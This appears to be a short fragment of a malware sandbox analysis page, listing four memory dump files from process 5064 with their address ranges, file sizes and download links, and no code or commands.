memory/5064-4-0x0000000074520000-0x0000000074CD0000-memory.dmp

Filesize
7.7MB

Download
memory/5064-3-0x000000000ADA0000-0x000000000AE06000-memory.dmp

Filesize
408KB

Download
memory/5064-2-0x00000000030D0000-0x00000000030D6000-memory.dmp

Filesize
24KB

Download
memory/5064-1-0x0000000000CF0000-0x0000000000D3C000-memory.dmp

Filesize
304KB

Download